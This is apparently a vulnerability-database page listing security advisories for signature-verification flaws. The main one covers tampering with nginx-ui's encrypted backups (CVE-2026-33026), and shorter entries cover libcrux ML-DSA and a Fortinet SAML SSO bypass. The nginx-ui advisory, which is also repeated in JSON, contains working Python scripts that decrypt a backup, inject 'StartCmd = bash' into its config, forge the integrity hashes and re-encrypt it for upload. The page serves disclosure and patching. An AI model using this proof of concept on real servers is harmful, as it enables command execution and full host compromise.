blob = encrypt_file(data, key_b64, iv_b64)
target_name = fname.replace(".decrypted", "")
encrypted_blobs[target_name] = blob
print(f"[*] Cipher {target_name}: {len(blob)} bytes")
hash_content = ""
for name, blob in encrypted_blobs.items():
h = hashlib.sha256(blob).hexdigest()
hash_content += f"{name}: {h}\n"
encrypted_hash_info = encrypt_file(hash_content.encode(), key_b64, iv_b64)
encrypted_blobs["hash_info.txt"] = encrypted_hash_info
with zipfile.ZipFile(output_filename, 'w', compression=zipfile.ZIP_DEFLATED) as zf:
for name, blob in encrypted_blobs.items():
zf.writestr(name, blob)
print(f"\n[*] Backup rebuild: {output_filename}")
print(f"[*] Verificando integridad...")
TOKEN = "xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx"
FILES = ["nginx-ui.zip.decrypted", "nginx.zip.decrypted"]
if __name__ == "__main__":
build_rebuilt_backup(FILES, TOKEN)
-
Upload the tampered backup to the
nginx-uirestore interface. -
Observation: The system accepts the modified backup. Although a warning may appear, the restoration proceeds and the malicious configuration is applied, granting the attacker arbitrary command execution on the host.
Impact
An attacker capable of uploading or supplying a malicious backup can modify application configuration and internal state during restoration.
Potential impacts include:
- Persistent configuration tampering
- Backdoor insertion into nginx configuration
- Execution of attacker-controlled commands depending on configuration settings
- Full compromise of the nginx-ui instance
The severity depends on the restore permissions and deployment configuration.
Recommended Mitigation
- Introduce a trusted integrity root Integrity metadata must not be derived solely from data contained in the backup. Possible solutions include:
- Signing backup metadata using a server-side private key
-
Storing integrity metadata separately from the backup archive
-
Enforce integrity verification The restore operation must abort if hash verification fails.
-
Avoid circular trust models If encryption keys are distributed to clients, the backup must not rely on attacker-controlled metadata for integrity validation.
-
Optional cryptographic improvements While not sufficient alone, switching to an authenticated encryption scheme such as AES-GCM can simplify integrity protection if the encryption keys remain secret.
This vulnerability arises from a circular trust model where integrity metadata is protected using the same key that is provided to the client, allowing attackers to recompute valid integrity data after modifying the archive.
Regression
The previously reported vulnerability (GHSA-g9w5-qffc-6762) addressed unauthorized access to backup files but did not resolve the underlying cryptographic design issue.
The backup format still allows attacker-controlled modification of encrypted backup contents because integrity metadata is protected using the same key distributed to clients.
As a result, the fundamental integrity weakness remains exploitable even after the previous fix.
A patched version is available at https://github.com/0xJacky/nginx-ui/releases/tag/v2.3.4.
{
"affected": [
{
"package": {
"ecosystem": "Go",
"name": "github.com/0xJacky/Nginx-UI"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "1.9.10-0.20260315015203-f61bcec547c0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-33026"
],
"database_specific": {
"cwe_ids": [
"CWE-312",
"CWE-347",
"CWE-354"
],
"github_reviewed": true,
"github_reviewed_at": "2026-03-30T16:23:34Z",
"nvd_published_at": "2026-03-30T20:16:22Z",
"severity": "CRITICAL"
},
"details": "## Summary\nThe `nginx-ui` backup restore mechanism allows attackers to tamper with encrypted backup archives and inject malicious configuration during restoration.\n\n## Details\nThe backup format lacks a trusted integrity root. Although files are encrypted, the encryption key and IV are provided to the client and the integrity metadata (`hash_info.txt`) is encrypted using the same key. As a result, an attacker who can access the backup token can decrypt the archive, modify its contents, recompute integrity hashes, and re-encrypt the bundle.\n\nBecause the restore process does not enforce integrity verification and accepts backups even when hash mismatches are detected, the system restores attacker-controlled configuration even when integrity verification warnings are raised. In certain configurations this may lead to arbitrary command execution on the host.\n\nThe backup system is built around the following workflow:\n\n1. Backup files are compressed into `nginx-ui.zip` and `nginx.zip`.\n2. The files are encrypted using AES-256-CBC.\n3. SHA-256 hashes of the encrypted files are stored in `hash_info.txt`.\n4. The hash file is also encrypted with the same AES key and IV.\n5. The AES key and IV are provided to the client as a \"backup security token\".\n\nThis architecture creates a circular trust model:\n\n- The encryption key is available to the client.\n- The integrity metadata is encrypted with that same key.\n- The restore process trusts hashes contained within the backup itself.\n\nBecause the attacker can decrypt and re-encrypt all files using the provided token, they can also recompute valid hashes for any modified content.\n\n### Environment\n- **OS**: Kali Linux 6.17.10-1kali1 (6.17.10+kali-amd64)\n- **Application Version**: nginx-ui v2.3.3 (513) e5da6dd (go1.26.0)\n- **Deployment**: Docker Container default installation\n- **Relevant Source Files**:\n - `backup_crypto.go`\n - `backup.go`\n - `restore.go`\n - `SystemRestoreContent.vue`\n\n\n## PoC\n1. Generate a backup and extract the security token (Key and IV) from the HTTP response headers or the `.key` file.\n \u003cimg width=\"1483\" height=\"586\" alt=\"image\" src=\"https://github.com/user-attachments/assets/857a1b3f-ce66-4929-a165-2f28393df17f\" /\u003e\n\n2. Decrypt the `nginx-ui.zip` archive using the obtained token.\n``` \nimport base64\nimport os\nimport sys\nimport zipfile\nfrom io import BytesIO\nfrom Crypto.Cipher import AES\nfrom Crypto.Util.Padding import unpad\n\ndef decrypt_aes_cbc(encrypted_data: bytes, key_b64: str, iv_b64: str) -\u003e bytes:\n key = base64.b64decode(key_b64)\n iv = base64.b64decode(iv_b64)\n \n cipher = AES.new(key, AES.MODE_CBC, iv)\n decrypted = cipher.decrypt(encrypted_data)\n return unpad(decrypted, AES.block_size)\n\ndef process_local_backup(file_path, token, output_dir):\n key_b64, iv_b64 = token.split(\":\")\n os.makedirs(output_dir, exist_ok=True)\n print(f\"[*] File processing: {file_path}\")\n \n with zipfile.ZipFile(file_path, \u0027r\u0027) as main_zip:\n main_zip.extractall(output_dir)\n \n files_to_decrypt = [\"hash_info.txt\", \"nginx-ui.zip\", \"nginx.zip\"]\n \n for filename in files_to_decrypt:\n path = os.path.join(output_dir, filename)\n if os.path.exists(path):\n with open(path, \"rb\") as f:\n encrypted = f.read()\n \n decrypted = decrypt_aes_cbc(encrypted, key_b64, iv_b64)\n \n out_path = path + \".decrypted\"\n with open(out_path, \"wb\") as f:\n f.write(decrypted)\n print(f\"[*] Successfully decrypted: {out_path}\")\n\n# Manual config\nBACKUP_FILE = \"backup-20260314-151959.zip\" \nTOKEN = \"xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\"\nOUTPUT = \"decrypted\"\n\nif __name__ == \"__main__\":\n process_local_backup(BACKUP_FILE, TOKEN, OUTPUT)\n```\n\n3. Modify the contained `app.ini` to inject malicious configuration (e.g., `StartCmd = bash`).\n4. Re-compress the files and calculate the new SHA-256 hash.\n5. Update `hash_info.txt` with the new, legitimate-looking hashes for the modified files.\n6. Encrypt the bundle again using the original Key and IV.\n```\nimport base64\nimport hashlib\nimport os\nimport zipfile\nfrom Crypto.Cipher import AES\nfrom Crypto.Util.Padding import pad\n\ndef encrypt_file(data, key_b64, iv_b64):\n key = base64.b64decode(key_b64)\n iv = base64.b64decode(iv_b64)\n cipher = AES.new(key, AES.MODE_CBC, iv)\n return cipher.encrypt(pad(data, AES.block_size))\n\ndef build_rebuilt_backup(files, token, output_filename=\"backup_rebuild.zip\"):\n key_b64, iv_b64 = token.split(\":\")\n \n encrypted_blobs = {}\n for fname in files:\n with open(fname, \"rb\") as f:\n data = f.read()\n \n blob = encrypt_file(data, key_b64, iv_b64)\n\n target_name = fname.replace(\".decrypted\", \"\")\n encrypted_blobs[target_name] = blob\n print(f\"[*] Cipher {target_name}: {len(blob)} bytes\")\n\n hash_content = \"\"\n for name, blob in encrypted_blobs.items():\n h = hashlib.sha256(blob).hexdigest()\n hash_content += f\"{name}: {h}\\n\"\n \n encrypted_hash_info = encrypt_file(hash_content.encode(), key_b64, iv_b64)\n encrypted_blobs[\"hash_info.txt\"] = encrypted_hash_info\n\n with zipfile.ZipFile(output_filename, \u0027w\u0027, compression=zipfile.ZIP_DEFLATED) as zf:\n for name, blob in encrypted_blobs.items():\n zf.writestr(name, blob)\n \n print(f\"\\n[*] Backup rebuild: {output_filename}\")\n print(f\"[*] Verificando integridad...\")\n\nTOKEN = \"xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\"\nFILES = [\"nginx-ui.zip.decrypted\", \"nginx.zip.decrypted\"]\n\nif __name__ == \"__main__\":\n build_rebuilt_backup(FILES, TOKEN)\n```\n7. Upload the tampered backup to the `nginx-ui` restore interface.\n \u003cimg width=\"1059\" height=\"290\" alt=\"image\" src=\"https://github.com/user-attachments/assets/66872685-b85b-4c81-ae24-13c811acba9a\" /\u003e\n\n\n8. **Observation**: The system accepts the modified backup. Although a warning may appear, the restoration proceeds and the malicious configuration is applied, granting the attacker arbitrary command execution on the host.\n \u003cimg width=\"1316\" height=\"627\" alt=\"image\" src=\"https://github.com/user-attachments/assets/2752749e-ac39-4d60-88ca-5058b8e840a6\" /\u003e\n\n\n\n## Impact\nAn attacker capable of uploading or supplying a malicious backup can modify application configuration and internal state during restoration.\n\nPotential impacts include:\n\n- Persistent configuration tampering\n- Backdoor insertion into nginx configuration\n- Execution of attacker-controlled commands depending on configuration settings\n- Full compromise of the nginx-ui instance\n\nThe severity depends on the restore permissions and deployment configuration.\n\n## Recommended Mitigation\n\n1. **Introduce a trusted integrity root**\nIntegrity metadata must not be derived solely from data contained in the backup. Possible solutions include:\n - Signing backup metadata using a server-side private key\n - Storing integrity metadata separately from the backup archive\n\n2. **Enforce integrity verification**\nThe restore operation must abort if hash verification fails.\n\n3. **Avoid circular trust models**\nIf encryption keys are distributed to clients, the backup must not rely on attacker-controlled metadata for integrity validation.\n\n4. **Optional cryptographic improvements**\nWhile not sufficient alone, switching to an authenticated encryption scheme such as AES-GCM can simplify integrity protection if the encryption keys remain secret.\n\nThis vulnerability arises from a circular trust model where integrity metadata is protected using the same key that is provided to the client, allowing attackers to recompute valid integrity data after modifying the archive.\n\n## Regression\n\nThe previously reported vulnerability (GHSA-g9w5-qffc-6762) addressed unauthorized access to backup files but did not resolve the underlying cryptographic design issue.\n\nThe backup format still allows attacker-controlled modification of encrypted backup contents because integrity metadata is protected using the same key distributed to clients.\n\nAs a result, the fundamental integrity weakness remains exploitable even after the previous fix.\n\nA patched version is available at https://github.com/0xJacky/nginx-ui/releases/tag/v2.3.4.",
"id": "GHSA-fhh2-gg7w-gwpq",
"modified": "2026-07-06T19:35:49Z",
"published": "2026-03-30T16:23:34Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/0xJacky/nginx-ui/security/advisories/GHSA-fhh2-gg7w-gwpq"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33026"
},
{
"type": "WEB",
"url": "https://github.com/0xJacky/nginx-ui/commit/f61bcec547c0f305e35348d6440ef156c1d5c3cb"
},
{
"type": "PACKAGE",
"url": "https://github.com/0xJacky/nginx-ui"
},
{
"type": "WEB",
"url": "https://github.com/0xJacky/nginx-ui/releases/tag/v2.3.4"
},
{
"type": "ADVISORY",
"url": "https://github.com/advisories/GHSA-g9w5-qffc-6762"
},
{
"type": "WEB",
"url": "https://pkg.go.dev/vuln/GO-2026-4903"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H",
"type": "CVSS_V4"
}
],
"summary": "nginx-ui Backup Restore Allows Tampering with Encrypted Backups"
}
GHSA-FHVH-VW7H-9XF3
Vulnerability from github – Published: 2026-05-19 16:18 – Updated: 2026-05-19 16:18The AVX2 implementation of ML-DSA verification incorrectly implemented
the use_hint function, mishandling an edge case that should lead to
signature rejection.
Impact
An attacker could make the ML-DSA verifier accept a crafted invalid signature under a maliciously generated verification key, if the AVX2 implementation is used.
Mitigation
From version 0.0.9 the edge case is handled correctly and invalid
signatures are rejected.
{
"affected": [
{
"package": {
"ecosystem": "crates.io",
"name": "libcrux-ml-dsa"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "0.0.9"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [],
"database_specific": {
"cwe_ids": [
"CWE-347"
],
"github_reviewed": true,
"github_reviewed_at": "2026-05-19T16:18:53Z",
"nvd_published_at": null,
"severity": "HIGH"
},
"details": "The AVX2 implementation of ML-DSA verification incorrectly implemented\nthe `use_hint` function, mishandling an edge case that should lead to\nsignature rejection.\n\n## Impact\nAn attacker could make the ML-DSA verifier accept a crafted invalid\nsignature under a maliciously generated verification key, if the AVX2\nimplementation is used.\n\n## Mitigation\nFrom version `0.0.9` the edge case is handled correctly and invalid\nsignatures are rejected.",
"id": "GHSA-fhvh-vw7h-9xf3",
"modified": "2026-05-19T16:18:53Z",
"published": "2026-05-19T16:18:53Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/C2SP/wycheproof/pull/234"
},
{
"type": "WEB",
"url": "https://github.com/cryspen/libcrux/pull/1398"
},
{
"type": "WEB",
"url": "https://github.com/tink-crypto/tink-go/pull/48"
},
{
"type": "PACKAGE",
"url": "https://github.com/cryspen/libcrux"
},
{
"type": "WEB",
"url": "https://rustsec.org/advisories/RUSTSEC-2026-0125.html"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N",
"type": "CVSS_V4"
}
],
"summary": " libcrux-ml-dsa: Signature Verification on AVX2 Platforms Mishandles Edge Case"
}
GHSA-FJJ2-P33C-F8QQ
Vulnerability from github – Published: 2025-12-09 18:30 – Updated: 2026-06-09 12:31A improper verification of cryptographic signature vulnerability in Fortinet FortiOS 7.6.0 through 7.6.3, FortiOS 7.4.0 through 7.4.8, FortiOS 7.2.0 through 7.2.11, FortiOS 7.0.0 through 7.0.17, FortiProxy 7.6.0 through 7.6.3, FortiProxy 7.4.0 through 7.4.10, FortiProxy 7.2.0 through 7.2.14, FortiProxy 7.0.0 through 7.0.21, FortiSwitchManager 7.2.0 through 7.2.6, FortiSwitchManager 7.0.0 through 7.0.5 allows an unauthenticated attacker to bypass the FortiCloud SSO login authentication via a crafted SAML response message.
{
"affected": [],
"aliases": [
"CVE-2025-59718"
],
"database_specific": {
"cwe_ids": [
"CWE-347"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2025-12-09T18:15:54Z",
"severity": "CRITICAL"
},
"details": "A improper verification of cryptographic signature vulnerability in Fortinet FortiOS 7.6.0 through 7.6.3, FortiOS 7.4.0 through 7.4.8, FortiOS 7.2.0 through 7.2.11, FortiOS 7.0.0 through 7.0.17, FortiProxy 7.6.0 through 7.6.3, FortiProxy 7.4.0 through 7.4.10, FortiProxy 7.2.0 through 7.2.14, FortiProxy 7.0.0 through 7.0.21, FortiSwitchManager 7.2.0 through 7.2.6, FortiSwitchManager 7.0.0 through 7.0.5 allows an unauthenticated attacker to bypass the FortiCloud SSO login authentication via a crafted SAML response message.",
"id": "GHSA-fjj2-p33c-f8qq",
"modified": "2026-06-09T12:31:59Z",
"published": "2025-12-09T18:30:46Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-59718"
},
{
"type": "WEB",
"url": "https://arcticwolf.com/resources/blog/arctic-wolf-observes-malicious-sso-logins-following-disclosure-cve-2025-59718-cve-2025-59719"
},
{
"type": "WEB",
"url": "https://cert-portal.siemens.com/productcert/html/ssa-864900.html"
},
{
"type": "WEB",
"url": "https://fortiguard.fortinet.com/psirt/FG-IR-25-647"
},
{
"type": "WEB",
"url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2025-59718"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
No mitigation information available for this CWE.
CAPEC-463: Padding Oracle Crypto Attack
An adversary is able to efficiently decrypt data without knowing the decryption key if a target system leaks data on whether or not a padding error happened while decrypting the ciphertext. A target system that leaks this type of information becomes the padding oracle and an adversary is able to make use of that oracle to efficiently decrypt data without knowing the decryption key by issuing on average 128*b calls to the padding oracle (where b is the number of bytes in the ciphertext block). In addition to performing decryption, an adversary is also able to produce valid ciphertexts (i.e., perform encryption) by using the padding oracle, all without knowing the encryption key.
CAPEC-475: Signature Spoofing by Improper Validation
An adversary exploits a cryptographic weakness in the signature verification algorithm implementation to generate a valid signature without knowing the key.